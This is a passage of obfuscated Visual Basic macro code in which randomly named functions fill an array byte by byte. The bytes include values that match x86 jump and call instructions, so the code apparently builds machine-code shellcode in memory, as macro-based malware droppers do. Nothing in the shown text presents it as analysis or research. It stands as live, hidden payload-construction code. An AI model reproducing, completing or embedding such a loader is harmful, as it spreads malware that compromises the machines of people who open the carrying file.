RQC5(668) = 0
RQC5(FB7 + 35) = 0
RQC5(FB7 + 36) = 5

End Function
Static Function HRLLI(ByRef M111M As Variant, ByVal AJEUV4 As Long, ByRef PG3H8N As Double, ByVal CAPUTW As Long, ByVal TRY As Variant, ByVal HJ9 As Byte, ByRef FHMJX As Currency) As Variant
M111M(671) = 181
M111M(CAPUTW + 1) = 26
M111M(CAPUTW + 2) = 0
M111M(CAPUTW + 3) = 0
M111M(CAPUTW + 4) = 141
M111M(CAPUTW + 5) = 128
M111M(CAPUTW + 6) = 45
M111M(678) = 118
M111M(CAPUTW + 8) = 0
M111M(CAPUTW + 9) = 0
M111M(681) = 141
M111M(CAPUTW + 11) = 128
M111M(CAPUTW + 12) = 208
M111M(CAPUTW + 13) = 100
M111M(685) = 0
M111M(686) = 0
M111M(CAPUTW + 16) = 89

End Function
Sub RLM(ByVal MPWJVC As Long, ByVal CKN5 As Long, ByVal LEKI As Currency, ByRef MQAW As Variant)
MQAW(688) = 88
MQAW(689) = 157
MQAW(MPWJVC + 2) = 157
MQAW(MPWJVC + 3) = 235
MQAW(692) = 63
MQAW(693) = 233
MQAW(694) = 101
MQAW(MPWJVC + 7) = 255
MQAW(MPWJVC + 8) = 255
MQAW(MPWJVC + 9) = 255
MQAW(MPWJVC + 10) = 87
MQAW(MPWJVC + 11) = 95
MQAW(MPWJVC + 12) = 83
MQAW(701) = 91
MQAW(MPWJVC + 14) = 233
MQAW(703) = 149
MQAW(MPWJVC + 16) = 1
MQAW(705) = 0
MQAW(706) = 0
MQAW(707) = 233
MQAW(708) = 1
MQAW(709) = 255
MQAW(710) = 255
MQAW(MPWJVC + 23) = 255
MQAW(712) = 86
MQAW(MPWJVC + 25) = 94
MQAW(MPWJVC + 26) = 81
MQAW(715) = 233
MQAW(MPWJVC + 28) = 89
MQAW(717) = 255
MQAW(MPWJVC + 30) = 255
MQAW(719) = 255
MQAW(720) = 233
MQAW(MPWJVC + 33) = 77
MQAW(722) = 1
MQAW(MPWJVC + 35) = 0
MQAW(MPWJVC + 36) = 0
MQAW(MPWJVC + 37) = 233
MQAW(MPWJVC + 38) = 32
MQAW(727) = 255
MQAW(MPWJVC + 40) = 255
MQAW(MPWJVC + 41) = 255
MQAW(MPWJVC + 42) = 235
MQAW(731) = 19
MQAW(732) = 233
MQAW(733) = 113
MQAW(MPWJVC + 46) = 255
MQAW(MPWJVC + 47) = 255
MQAW(MPWJVC + 48) = 255
MQAW(MPWJVC + 49) = 81
MQAW(738) = 87
MQAW(739) = 95
MQAW(MPWJVC + 52) = 89
MQAW(741) = 233
MQAW(MPWJVC + 54) = 61
MQAW(743) = 1
MQAW(744) = 0
MQAW(745) = 0
MQAW(746) = 233
MQAW(747) = 98
MQAW(MPWJVC + 60) = 1
MQAW(MPWJVC + 61) = 0
MQAW(MPWJVC + 62) = 0
MQAW(MPWJVC + 63) = 233
MQAW(752) = 211
MQAW(753) = 0
MQAW(754) = 0
MQAW(MPWJVC + 67) = 0
MQAW(MPWJVC + 68) = 235
MQAW(757) = 69
MQAW(758) = 233
MQAW(MPWJVC + 71) = 189
MQAW(760) = 0
MQAW(761) = 0
MQAW(762) = 0
MQAW(763) = 233
MQAW(MPWJVC + 76) = 65

End Sub
Public Function PHGI(ByRef MEW As Variant, ByVal ZMPW As Long, ByVal YNLV As Long) As Double
MEW(YNLV + 0) = 255
MEW(YNLV + 1) = 255
MEW(YNLV + 2) = 255
MEW(YNLV + 3) = 233
MEW(YNLV + 4) = 245
MEW(770) = 254
MEW(771) = 255
MEW(772) = 255
MEW(773) = 232
MEW(YNLV + 9) = 9
MEW(YNLV + 10) = 2
MEW(YNLV + 11) = 0
MEW(777) = 0
MEW(YNLV + 13) = 233
MEW(779) = 1
MEW(YNLV + 15) = 255
MEW(YNLV + 16) = 255
MEW(782) = 255
MEW(YNLV + 18) = 88
MEW(784) = 233
MEW(785) = 219
MEW(786) = 254
MEW(YNLV + 22) = 255
MEW(YNLV + 23) = 255
MEW(YNLV + 24) = 235
MEW(790) = 93
MEW(YNLV + 26) = 156
MEW(YNLV + 27) = 86
MEW(793) = 80
MEW(YNLV + 29) = 129
MEW(795) = 238
…